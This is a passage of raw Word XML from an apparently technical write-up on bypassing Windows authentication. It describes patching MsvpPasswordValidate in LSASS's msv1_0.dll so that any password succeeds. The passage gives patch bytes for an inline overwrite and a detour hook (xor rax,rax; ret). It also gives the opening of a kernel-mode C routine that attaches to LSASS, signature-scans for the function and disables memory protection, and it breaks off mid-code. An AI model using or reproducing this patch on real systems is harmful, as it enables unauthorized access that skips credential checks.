        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XORing with itself - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>RET</w:t>
      </w:r>
      <w:r>
        <w:t>: Returns immediately, bypassing all comparison logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1F9625" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
      <w:r>
        <w:t>Every password is accepted because the function immediately returns STATUS_SUCCESS before ever reaching the comparison logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD00141" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>4.4 Detour/Trampoline Hooking (Alternative)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CCDF1A" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rather than overwriting, a more sophisticated approach uses a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>detour hook</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13979CAC" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>; Original instruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A623D1D" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="3688"/>
        </w:tabs>
        <w:spacing w:after="238" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>48 8D 15 01 00 00 00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve">; lea </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>rdx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>, [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>rel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CF5813" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>; Our patch (6 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E72C93C" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4734"/>
        </w:tabs>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">E9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="40A170"/>
        </w:rPr>
        <w:t>00 01 00 00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="40A170"/>
        </w:rPr>
        <w:tab/>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jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x100 (relative jump to our code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749EF80F" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="3426"/>
        </w:tabs>
        <w:spacing w:after="239" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>90</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>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nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (padding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119F3B8E" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>; Our injected shellcode (at offset 0x100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BC83D7" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="3374"/>
          <w:tab w:val="center" w:pos="5414"/>
        </w:tabs>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>48 31 C0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>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xor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve"> rax, rax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:tab/>
        <w:t>(EAX = 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1A8CFE" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2903"/>
          <w:tab w:val="center" w:pos="5362"/>
        </w:tabs>
        <w:spacing w:after="120" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>C3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>; ret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:tab/>
        <w:t>(return)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689FEDD3" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>This approach: - Jumps to attacker code - Sets EAX = 0 (success) - Returns control to the caller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7393BD" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>Both approaches achieve the same result: unconditional authentication success.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF79C91" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>4.5 The Complete Memory Patch Operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3E3787" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>The entire process from location to patch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E4E926" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">NTSTATUS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PatchMsvpPasswordValidate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">PEPROCESS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>LsassProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD105A2" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="233" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">KAPC_STATE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ApcState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D205D8" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Attach to LSASS address space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5237222F" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>KeStackAttachProcess</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LsassProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>, &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ApcState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28274270" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052C829B" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="873" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Find msv1_0.dll base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179B2577" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="238" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1856" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">PVOID Msv1_0Base </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>FindModuleBase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4070A1"/>
        </w:rPr>
        <w:t>L"msv1_0.dll"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F8FFB4" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="873" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve">// Signature scan for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>MsvpPasswordValidate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C765C15" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="873" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">PVOID </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>FunctionAddr</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ScanForSignature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="53B7543D" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="1292" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Msv1_0Base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B27945B" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="1292" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="40A170"/>
        </w:rPr>
        <w:t>0x100000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Scan size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78734BFC" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="1292" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>SignatureBytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A36F615" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="1292" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>SignatureSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="298B876E" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="234" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="873" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D74DEA" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="873" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Disable memory protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D50ABD" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="873" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">LARGE_INTEGER </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>OldProtect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5609AA62" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="873" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">SIZE_T </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>RegionSize</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color w:val="40A170"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDA5482" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="1281" w:right="3452" w:hanging="418"/>
        <w:jc w:val="left"/>
      </w:pPr>
